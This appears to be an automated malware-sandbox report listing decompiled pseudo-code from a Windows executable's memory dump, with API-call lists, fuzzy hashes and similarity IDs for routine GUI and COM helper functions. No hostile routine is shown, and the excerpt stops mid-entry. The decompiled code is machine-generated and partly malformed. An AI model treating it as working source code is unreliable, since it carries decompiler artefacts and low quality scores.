                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: 7345173451680$7345171073452140
                                                                        • String ID: FFC
                                                                        • API String ID: 821207058-3265319113
                                                                        • Opcode ID: c553ae45f4f59dda8c743e9a5beeb43619ad60567a59fbf0dee4961d1089d07a
                                                                        • Instruction ID: 8431b77a0cc210c779f3d261e8a6c9ecaf50c2f7b8c230ae1f7395ec22db308d
                                                                        • Opcode Fuzzy Hash: c553ae45f4f59dda8c743e9a5beeb43619ad60567a59fbf0dee4961d1089d07a
                                                                        • Instruction Fuzzy Hash: 48218174740214BFDB00EBE9DC92F6977F8EB49704F6044A6F904EB291DA79AD40CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 47%
                                                                        			E0042761C(intOrPtr _a4, intOrPtr* _a8) {
                                                                        				void _v20;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t23;
                                                                        				int _t24;
                                                                        				intOrPtr _t26;
                                                                        				intOrPtr _t27;
                                                                        				intOrPtr* _t29;
                                                                        				intOrPtr* _t31;
                                                                        
                                                                        				_t29 = _a8;
                                                                        				_t27 = _a4;
                                                                        				if( *0x496ac9 != 0) {
                                                                        					_t24 = 0;
                                                                        					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                                        						 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                        						 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                        						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                                                        						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						_t31 = _t29;
                                                                        						 *(_t31 + 0x24) = 1;
                                                                        						if( *_t31 >= 0x4c) {
                                                                        							_push("DISPLAY");
                                                                        							_push(_t31 + 0x28);
                                                                        							L00406A9C();
                                                                        						}
                                                                        						_t24 = 1;
                                                                        					}
                                                                        				} else {
                                                                        					_t26 =  *0x496ab0; // 0x42761c
                                                                        					 *0x496ab0 = E00427218(5, _t23, _t26, _t27, _t29);
                                                                        					_t24 =  *0x496ab0(_t27, _t29);
                                                                        				}
                                                                        				return _t24;
                                                                        			}















                                                                        APIs
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00427674
                                                                        • GetSystemMetrics.USER32 ref: 00427689
                                                                        • GetSystemMetrics.USER32 ref: 00427694
                                                                        • lstrcpy.KERNEL32(?,DISPLAY), ref: 004276BE
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                        • String ID: DISPLAY$GetMonitorInfoA
                                                                        • API String ID: 2545840971-1370492664
                                                                        • Opcode ID: 29cf01dcd43958f641ba807ef5d29dee25e5501a003724a3729d2d1307860ead
                                                                        • Instruction ID: fbb31de7d48d14f86b9486c0f2b6d2713dbdd219238fa15b14bdad62d3ba1336
                                                                        • Opcode Fuzzy Hash: 29cf01dcd43958f641ba807ef5d29dee25e5501a003724a3729d2d1307860ead
                                                                        • Instruction Fuzzy Hash: 0411E731704B215FD3208F75AC48B67B7A9EF06324F50853FED46A7651D374A8008B6C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 47%
                                                                        			E004276F0(intOrPtr _a4, intOrPtr* _a8) {
                                                                        				void _v20;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t23;
                                                                        				int _t24;
                                                                        				intOrPtr _t26;
                                                                        				intOrPtr _t27;
                                                                        				intOrPtr* _t29;
                                                                        				intOrPtr* _t31;
                                                                        
                                                                        				_t29 = _a8;
                                                                        				_t27 = _a4;
                                                                        				if( *0x496aca != 0) {
                                                                        					_t24 = 0;
                                                                        					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                                                        						 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                        						 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                        						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                                                        						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						_t31 = _t29;
                                                                        						 *(_t31 + 0x24) = 1;
                                                                        						if( *_t31 >= 0x4c) {
                                                                        							_push("DISPLAY");
                                                                        							_push(_t31 + 0x28);
                                                                        							L00406A9C();
                                                                        						}
                                                                        						_t24 = 1;
                                                                        					}
                                                                        				} else {
                                                                        					_t26 =  *0x496ab4; // 0x4276f0
                                                                        					 *0x496ab4 = E00427218(6, _t23, _t26, _t27, _t29);
                                                                        					_t24 =  *0x496ab4(_t27, _t29);
                                                                        				}
                                                                        				return _t24;
                                                                        			}















                                                                        APIs
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00427748
                                                                        • GetSystemMetrics.USER32 ref: 0042775D
                                                                        • GetSystemMetrics.USER32 ref: 00427768
                                                                        • lstrcpy.KERNEL32(?,DISPLAY), ref: 00427792
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                        • String ID: DISPLAY$GetMonitorInfoW
                                                                        • API String ID: 2545840971-2774842281
                                                                        • Opcode ID: 86a7c240a20f1940e20b11c1b8e177f6ccac7c4339d5c7d8de5956c4a5bb898f
                                                                        • Instruction ID: 831a537686c86f16d1a85402d57f1e65c448198929f9e699794ec6438de5e3da
                                                                        • Opcode Fuzzy Hash: 86a7c240a20f1940e20b11c1b8e177f6ccac7c4339d5c7d8de5956c4a5bb898f
                                                                        • Instruction Fuzzy Hash: AC11E4717057119FD3209F60AC407A7B7E8EB86314F40853BED49A7251D274B8008BAC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E004238F0(int __eax, void* __ecx, intOrPtr __edx) {
                                                                        				intOrPtr _v8;
                                                                        				struct HDC__* _v12;
                                                                        				struct HDC__* _v16;
                                                                        				void* _v20;
                                                                        				struct tagRGBQUAD _v1044;
                                                                        				int _t16;
                                                                        				int _t37;
                                                                        				intOrPtr _t44;
                                                                        				void* _t46;
                                                                        				void* _t49;
                                                                        				void* _t51;
                                                                        				intOrPtr _t52;
                                                                        
                                                                        				_t16 = __eax;
                                                                        				_t49 = _t51;
                                                                        				_t52 = _t51 + 0xfffffbf0;
                                                                        				_v8 = __edx;
                                                                        				_t46 = __eax;
                                                                        				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
                                                                        					L5:
                                                                        					return _t16;
                                                                        				} else {
                                                                        					_t16 = E004212BC(_v8, 0xff,  &_v1044);
                                                                        					_t37 = _t16;
                                                                        					if(_t37 == 0) {
                                                                        						goto L5;
                                                                        					} else {
                                                                        						_v12 = GetDC(0);
                                                                        						_v16 = CreateCompatibleDC(_v12);
                                                                        						_v20 = SelectObject(_v16, _t46);
                                                                        						_push(_t49);
                                                                        						_push(0x42399f);
                                                                        						_push( *[fs:eax]);
                                                                        						 *[fs:eax] = _t52;
                                                                        						SetDIBColorTable(_v16, 0, _t37,  &_v1044);
                                                                        						_pop(_t44);
                                                                        						 *[fs:eax] = _t44;
                                                                        						_push(0x4239a6);
                                                                        						SelectObject(_v16, _v20);
                                                                        						DeleteDC(_v16);
                                                                        						return ReleaseDC(0, _v12);
                                                                        					}
                                                                        				}
                                                                        			}
















                                                                        APIs
                                                                          • Part of subcall function 004212BC: GetObjectA.GDI32(00000000,00000004), ref: 004212D3
                                                                          • Part of subcall function 004212BC: GetPaletteEntries.GDI32(00000000,00000000,?,?), ref: 004212F6
                                                                        • GetDC.USER32(00000000), ref: 0042392E
                                                                        • CreateCompatibleDC.GDI32(?), ref: 0042393A
                                                                        • SelectObject.GDI32(?), ref: 00423947
                                                                        • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,0042399F,?,?,?,?,00000000), ref: 0042396B
                                                                        • SelectObject.GDI32(?,?), ref: 00423985
                                                                        • DeleteDC.GDI32(?), ref: 0042398E
                                                                        • ReleaseDC.USER32 ref: 00423999
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                                                                        • String ID:
                                                                        • API String ID: 4046155103-0
                                                                        • Opcode ID: bfb2f096e7f8a1596dd92f3a4f2661b09649afef723ca803cc1e0f0ba574a4f3
                                                                        • Instruction ID: 2b4ad22b928df6106159cc93f20210c2255a60c226f768308a27e69030d134a8
                                                                        • Opcode Fuzzy Hash: bfb2f096e7f8a1596dd92f3a4f2661b09649afef723ca803cc1e0f0ba574a4f3
                                                                        • Instruction Fuzzy Hash: 1B1154B1E042196BDB10EFE9DC41EAEB3FCEB09304F4145AAB514E7381D6789E508759
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E004546C4(long __eax, void* __ecx, short __edx) {
                                                                        				struct tagPOINT _v24;
                                                                        				long _t7;
                                                                        				long _t12;
                                                                        				long _t19;
                                                                        				void* _t21;
                                                                        				struct HWND__* _t27;
                                                                        				short _t28;
                                                                        				void* _t30;
                                                                        				struct tagPOINT* _t31;
                                                                        
                                                                        				_t21 = __ecx;
                                                                        				_t7 = __eax;
                                                                        				_t31 = _t30 + 0xfffffff8;
                                                                        				_t28 = __edx;
                                                                        				_t19 = __eax;
                                                                        				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
                                                                        					L6:
                                                                        					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
                                                                        				} else {
                                                                        					 *((short*)(__eax + 0x44)) = __edx;
                                                                        					if(__edx != 0) {
                                                                        						L5:
                                                                        						_t7 = SetCursor(E0045469C(_t19, _t28));
                                                                        						goto L6;
                                                                        					} else {
                                                                        						GetCursorPos(_t31);
                                                                        						_push(_v24.y);
                                                                        						_t27 = WindowFromPoint(_v24);
                                                                        						if(_t27 == 0) {
                                                                        							goto L5;
                                                                        						} else {
                                                                        							_t12 = GetWindowThreadProcessId(_t27, 0);
                                                                        							if(_t12 != GetCurrentThreadId()) {
                                                                        								goto L5;
                                                                        							} else {
                                                                        								_t7 = SendMessageA(_t27, 0x20, _t27, E00407298(SendMessageA(_t27, 0x84, 0, E00407328(_t31, _t21)), 0x200));
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t7;
                                                                        			}













                                                                        APIs
                                                                        • GetCursorPos.USER32 ref: 004546DF
                                                                        • WindowFromPoint.USER32(?,?), ref: 004546EC
                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004546FA
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00454701
                                                                        • SendMessageA.USER32 ref: 0045471A
                                                                        • SendMessageA.USER32 ref: 00454731
                                                                        • SetCursor.USER32(00000000), ref: 00454743
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                        • String ID:
                                                                        • API String ID: 1770779139-0
                                                                        • Opcode ID: 3d56c9a08a5997f3f14bf83b8e0ff9a80a13e3b28eff73a018bfddd4205cad21
                                                                        • Instruction ID: a4fd025c39cd02020c09f08377d953acec842c109d22c87e699394f9229cea46
                                                                        • Opcode Fuzzy Hash: 3d56c9a08a5997f3f14bf83b8e0ff9a80a13e3b28eff73a018bfddd4205cad21
                                                                        • Instruction Fuzzy Hash: 2201B12664430025D62036764C86F7F25A88BDAB5AF11007FB904BE2C3EA3E9C45526E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E0040C430(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
                                                                        				char _v260;
                                                                        				char _v768;
                                                                        				char _v772;
                                                                        				short* _v776;
                                                                        				intOrPtr _v780;
                                                                        				char _v784;
                                                                        				signed int _v788;
                                                                        				signed short* _v792;
                                                                        				char _v796;
                                                                        				char _v800;
                                                                        				intOrPtr* _v804;
                                                                        				signed char _t44;
                                                                        				signed int _t49;
                                                                        				signed short* _t56;
                                                                        				char* _t58;
                                                                        				void* _t64;
                                                                        				intOrPtr* _t69;
                                                                        				signed short* _t76;
                                                                        				signed short* _t79;
                                                                        				intOrPtr _t88;
                                                                        				void* _t90;
                                                                        				void* _t92;
                                                                        				void* _t93;
                                                                        				void* _t94;
                                                                        				intOrPtr* _t102;
                                                                        				void* _t106;
                                                                        				intOrPtr _t107;
                                                                        				char* _t108;
                                                                        				void* _t109;
                                                                        
                                                                        				_v780 = __ecx;
                                                                        				_v776 = __eax;
                                                                        				_t44 =  *((intOrPtr*)(__edx));
                                                                        				_t97 = _t44 & 0x00000fff;
                                                                        				if((_t44 & 0x00000fff) != 0xc) {
                                                                        					_push(__edx);
                                                                        					_t88 = _v776;
                                                                        					_push(_t88);
                                                                        					L0040C12C();
                                                                        					return _t88;
                                                                        				}
                                                                        				if((_t44 & 0x00000040) == 0) {
                                                                        					_v792 =  *((intOrPtr*)(__edx + 8));
                                                                        				} else {
                                                                        					_v792 =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8))));
                                                                        				}
                                                                        				_v788 =  *_v792 & 0x0000ffff;
                                                                        				_t90 = _v788 - 1;
                                                                        				if(_t90 >= 0) {
                                                                        					_t94 = _t90 + 1;
                                                                        					_t106 = 0;
                                                                        					_t108 =  &_v772;
                                                                        					do {
                                                                        						_v804 = _t108;
                                                                        						_push(_v804 + 4);
                                                                        						_t16 = _t106 + 1; // 0x1
                                                                        						_t76 = _v792;
                                                                        						_push(_t76);
                                                                        						L0040C154();
                                                                        						if(_t76 != 0) {
                                                                        							E004028B0(0x14);
                                                                        						}
                                                                        						_push( &_v784);
                                                                        						_t19 = _t106 + 1; // 0x1
                                                                        						_t79 = _v792;
                                                                        						_push(_t79);
                                                                        						L0040C15C();
                                                                        						if(_t79 != 0) {
                                                                        							E004028B0(0x14);
                                                                        						}
                                                                        						 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                                                        						_t106 = _t106 + 1;
                                                                        						_t108 = _t108 + 8;
                                                                        						_t94 = _t94 - 1;
                                                                        					} while (_t94 != 0);
                                                                        				}
                                                                        				_push( &_v772);
                                                                        				_t49 = _v788;
                                                                        				_push(_t49);
                                                                        				_push(0xc);
                                                                        				L0040C144();
                                                                        				_t107 = _t49;
                                                                        				if(_t107 == 0) {
                                                                        					E004028B0(0x12);
                                                                        				}
                                                                        				E0040C2F0(_v776, _t97);
                                                                        				 *_v776 = 0x200c;
                                                                        				 *((intOrPtr*)(_v776 + 8)) = _t107;
                                                                        				_t92 = _v788 - 1;
                                                                        				if(_t92 >= 0) {
                                                                        					_t93 = _t92 + 1;
                                                                        					_t69 =  &_v768;
                                                                        					_t102 =  &_v260;
                                                                        					do {
                                                                        						 *_t102 =  *_t69;
                                                                        						_t102 = _t102 + 4;
                                                                        						_t69 = _t69 + 8;
                                                                        						_t93 = _t93 - 1;
                                                                        					} while (_t93 != 0);
                                                                        					do {
                                                                        						goto L17;
                                                                        					} while (_t64 != 0);
                                                                        					return _t64;
                                                                        				}
                                                                        				L17:
                                                                        				_push( &_v796);
                                                                        				_push( &_v260);
                                                                        				_t56 = _v792;
                                                                        				_push(_t56);
                                                                        				L0040C174();
                                                                        				if(_t56 != 0) {
                                                                        					E004028B0(0x14);
                                                                        				}
                                                                        				_push( &_v800);
                                                                        				_t58 =  &_v260;
                                                                        				_push(_t58);
                                                                        				_push(_t107);
                                                                        				L0040C174();
                                                                        				if(_t58 != 0) {
                                                                        					E004028B0(0x14);
                                                                        				}
                                                                        				_v780();
                                                                        				_t64 = E0040C3D4(_v788 - 1, _t109);
                                                                        			}

































                                                                        APIs
                                                                        • VariantCopy.OLEAUT32(?), ref: 0040C460
                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040C4C5
                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040C4E7
                                                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040C526
                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040C591
                                                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040C5B0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                        • String ID:
                                                                        • API String ID: 351091851-0
                                                                        • Opcode ID: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
                                                                        • Instruction ID: 91eb53b407ec2d2dd2796e8a100e52e0f4196e31d9e17e27235ea4b964657383
                                                                        • Opcode Fuzzy Hash: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
                                                                        • Instruction Fuzzy Hash: 7851EF75901529DBDB22DB59CD90ADAB3BCBF48304F0042FAE509E7352D674AF818F64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 81%
                                                                        			E00421568(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed int* _a4, signed int* _a8) {
                                                                        				intOrPtr* _v8;
                                                                        				intOrPtr _v12;
                                                                        				signed int _v16;
                                                                        				intOrPtr _v20;
                                                                        				signed int _v24;
                                                                        				signed int _v32;
                                                                        				struct HDC__* _v44;
                                                                        				signed int* _t36;
                                                                        				signed int _t39;
                                                                        				signed int _t42;
                                                                        				signed int* _t52;
                                                                        				signed int _t56;
                                                                        				intOrPtr _t66;
                                                                        				void* _t72;
                                                                        				void* _t73;
                                                                        				void* _t74;
                                                                        				intOrPtr _t75;
                                                                        
                                                                        				_t73 = _t74;
                                                                        				_t75 = _t74 + 0xffffff90;
                                                                        				_v16 = __ecx;
                                                                        				_v12 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_t52 = _a8;
                                                                        				_v24 = _v16 << 4;
                                                                        				_v20 = E004083E8(_v24, __eflags);
                                                                        				 *[fs:edx] = _t75;
                                                                        				_t56 = _v24;
                                                                        				 *((intOrPtr*)( *_v8 + 8))( *[fs:edx], 0x42185f, _t73, __edi, __esi, __ebx, _t72);
                                                                        				if(( *_t52 | _t52[1]) != 0) {
                                                                        					_t36 = _a4;
                                                                        					 *_t36 =  *_t52;
                                                                        					_t36[1] = _t52[1];
                                                                        				} else {
                                                                        					 *_a4 = GetSystemMetrics(0xb);
                                                                        					_a4[1] = GetSystemMetrics(0xc);
                                                                        				}
                                                                        				_v44 = GetDC(0);
                                                                        				if(_v44 == 0) {
                                                                        					E00420A2C(_t56);
                                                                        				}
                                                                        				_push(_t73);
                                                                        				_push(0x421651);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t75;
                                                                        				_t39 = GetDeviceCaps(_v44, 0xe);
                                                                        				_t42 = _t39 * GetDeviceCaps(_v44, 0xc);
                                                                        				if(_t42 <= 8) {
                                                                        					__eflags = 1;
                                                                        					_v32 = 1 << _t42;
                                                                        				} else {
                                                                        					_v32 = 0x7fffffff;
                                                                        				}
                                                                        				_pop(_t66);
                                                                        				 *[fs:eax] = _t66;
                                                                        				_push(E00421658);
                                                                        				return ReleaseDC(0, _v44);
                                                                        			}





















                                                                        APIs
                                                                        • GetSystemMetrics.USER32 ref: 004215B6
                                                                        • GetSystemMetrics.USER32 ref: 004215C2
                                                                        • GetDC.USER32(00000000), ref: 004215DE
                                                                        • GetDeviceCaps.GDI32(00000000,0000000E), ref: 00421605
                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00421612
                                                                        • ReleaseDC.USER32 ref: 0042164B
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CapsDeviceMetricsSystem$Release
                                                                        • String ID:
                                                                        • API String ID: 447804332-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 67%
                                                                        			E004219D8(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
                                                                        				char _v5;
                                                                        				struct HPALETTE__* _v12;
                                                                        				struct HDC__* _v16;
                                                                        				struct tagBITMAPINFO* _t36;
                                                                        				intOrPtr _t43;
                                                                        				struct HBITMAP__* _t47;
                                                                        				void* _t50;
                                                                        
                                                                        				_t36 = __ecx;
                                                                        				_t47 = __eax;
                                                                        				E00421888(__eax, _a4, __ecx);
                                                                        				_v12 = 0;
                                                                        				_v16 = CreateCompatibleDC(0);
                                                                        				_push(_t50);
                                                                        				_push(0x421a75);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t50 + 0xfffffff4;
                                                                        				if(__edx != 0) {
                                                                        					_v12 = SelectPalette(_v16, __edx, 0);
                                                                        					RealizePalette(_v16);
                                                                        				}
                                                                        				_v5 = GetDIBits(_v16, _t47, 0, _t36->bmiHeader.biHeight, _a8, _t36, 0) != 0;
                                                                        				_pop(_t43);
                                                                        				 *[fs:eax] = _t43;
                                                                        				_push(E00421A7C);
                                                                        				if(_v12 != 0) {
                                                                        					SelectPalette(_v16, _v12, 0);
                                                                        				}
                                                                        				return DeleteDC(_v16);
                                                                        			}











                                                                        APIs
                                                                          • Part of subcall function 00421888: GetObjectA.GDI32(?,00000054), ref: 0042189C
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 004219FA
                                                                        • SelectPalette.GDI32(?,?,00000000), ref: 00421A1B
                                                                        • RealizePalette.GDI32(?), ref: 00421A27
                                                                        • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 00421A3E
                                                                        • SelectPalette.GDI32(?,00000000,00000000), ref: 00421A66
                                                                        • DeleteDC.GDI32(?), ref: 00421A6F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                                                                        • String ID:
                                                                        • API String ID: 1221726059-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004333D8(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				char _v8;
                                                                        				void* _t20;
                                                                        				void* _t21;
                                                                        				void* _t27;
                                                                        				void* _t31;
                                                                        				void* _t35;
                                                                        				intOrPtr* _t43;
                                                                        
                                                                        				_t43 =  &_v8;
                                                                        				_t20 =  *0x47a8ac; // 0x0
                                                                        				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
                                                                        				_t21 =  *0x47a8ac; // 0x0
                                                                        				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
                                                                        				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
                                                                        					SetWindowLongA(_a4, 0xfffffff4, _a4);
                                                                        				}
                                                                        				_t27 =  *0x47a8ac; // 0x0
                                                                        				SetPropA(_a4,  *0x496b7a & 0x0000ffff, _t27);
                                                                        				_t31 =  *0x47a8ac; // 0x0
                                                                        				SetPropA(_a4,  *0x496b78 & 0x0000ffff, _t31);
                                                                        				_t35 =  *0x47a8ac; // 0x0
                                                                        				 *0x47a8ac = 0;
                                                                        				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
                                                                        				return  *_t43;
                                                                        			}











                                                                        APIs
                                                                        • SetWindowLongA.USER32 ref: 00433400
                                                                        • GetWindowLongA.USER32 ref: 0043340B
                                                                        • GetWindowLongA.USER32 ref: 0043341D
                                                                        • SetWindowLongA.USER32 ref: 00433430
                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 00433447
                                                                        • SetPropA.USER32(?,00000000,00000000), ref: 0043345E
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
